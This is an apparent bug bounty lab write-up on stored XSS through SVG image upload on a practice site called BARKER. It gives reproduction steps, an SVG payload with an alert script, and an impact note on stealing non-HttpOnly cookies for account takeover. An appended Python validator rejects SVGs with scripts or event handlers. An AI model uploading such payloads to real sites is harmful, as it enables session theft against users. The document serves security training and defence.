bugbountyhunter scope BARKER: Eighth Blood, Stored (Storage) Cross-Site Scripting (XSS) via SVG file upload in posts, report

一次保护十个 / 2024-08-11 / Original

After logging in you land on the home page; the post form has an Attach image control.

Look up an XSS payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files

Upload an SVG as the image: the SVG file is accepted and the server returns the image address.

PoC: https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

英哥's earlier report

I have discovered a Storage XSS vulnerability affecting the endpoint 'https://cfceb12f2bfd-sec875.a.barker-social.com/post' in the parameter 'post_image'. The payload requires no filter bypass and is a simple:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
```

You can see a working proof of concept here:

https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)

To reproduce:
1. After logging in, you will come to the home page. There is an Attach image in the message.

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367398/cajsidqey3up2g6ke99v.png)

2. Check XSS payload: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS Injection#xss-in-files

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367471/ayhhkvw7ugkx5eossb04.png)

3. Use SVG to upload pictures. It is found that the SVG file is uploaded successfully and the picture address is returned.

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367855/mmvkxsjmpd3ktefnsvae.png)

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367534/t4d7fegeelnyhl9bgacj.png)

4. You will observe the XSS executes:

https://cfceb12f2bfd-sec875.a.barker-social.com/storage/a23wZID1s0agMIDiLZqDzuJGxTZUA2osuxoYwhtU.svg

![image](https://res.cloudinary.com/bugbountynotes/image/upload/v1723367330/cbohfhn7zh7ubv3plmcc.png)

Payload used:

```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>
```

Vulnerable parameter: post_image
Endpoint/URL: https://cfceb12f2bfd-sec875.a.barker-social.com/post

Impact:
As the session cookies are not protected by HttpOnly, we can obtain these and achieve account takeover. As well as this, the CSRF token is stored in the DOM, which enables us to easily perform actions on behalf of the user.
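The root cause above is an image-upload endpoint that stores a browser-renderable SVG containing `<script>` and serves it from the application origin. The following is an added example (not BARKER's code and not part of either report) of the server-side check a defender would put in front of such an endpoint: it parses the upload as XML and rejects any SVG carrying active content. The function names and the acceptance policy are assumptions; the first sample is the payload quoted in the report, the second is a constructed benign SVG.

```python
import re
import xml.etree.ElementTree as ET

# Constructed sample 1: the SVG quoted in the report (carries a <script> element).
REPORT_PAYLOAD = b"""<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
  <script type="text/javascript">
    alert(document.domain);
  </script>
</svg>"""

# Constructed sample 2: a plain SVG icon with no active content.
BENIGN_SVG = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">
  <circle cx="5" cy="5" r="4" fill="red"/>
</svg>"""


def svg_script_findings(data: bytes) -> list[str]:
    """Return the reasons an SVG could run script when a browser opens it.
    An empty list means no active content was found. Malformed XML is
    reported as a finding so that a parser-confusion file is not accepted."""
    findings = []
    try:
        root = ET.fromstring(data)  # expat does not fetch the external DTD
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1].lower()  # strip the namespace
        if local in ("script", "foreignobject"):
            findings.append(f"<{local}> element")
        for attr, value in el.attrib.items():
            name = attr.rsplit("}", 1)[-1].lower()  # handles xlink:href too
            if name.startswith("on"):  # onload=, onclick=, onerror=, ...
                findings.append(f"event handler {name}= on <{local}>")
            if name == "href" and re.match(r"\s*javascript:", value, re.I):
                findings.append(f"javascript: URL in href on <{local}>")
    return findings


def upload_decision(filename: str, data: bytes) -> tuple[bool, str]:
    """Gate for the 'post_image' style parameter (hypothetical helper).
    SVGs with active content are rejected; clean SVGs are accepted but flagged
    to be served as a download, since even a clean SVG is a document, not a
    bitmap. Raster formats are left to the regular image validator."""
    looks_like_svg = filename.lower().endswith(".svg") or \
        data.lstrip().startswith((b"<?xml", b"<svg"))
    if not looks_like_svg:
        return True, "raster image: run normal image validation"
    findings = svg_script_findings(data)
    if findings:
        return False, "SVG rejected: " + "; ".join(findings)
    return True, "SVG accepted: serve with Content-Disposition: attachment"
```

The reject path above is what would have blocked the report's payload; the serve-as-attachment note covers the residual risk that a later bypass slips an active SVG through, because a downloaded file never executes in the application origin.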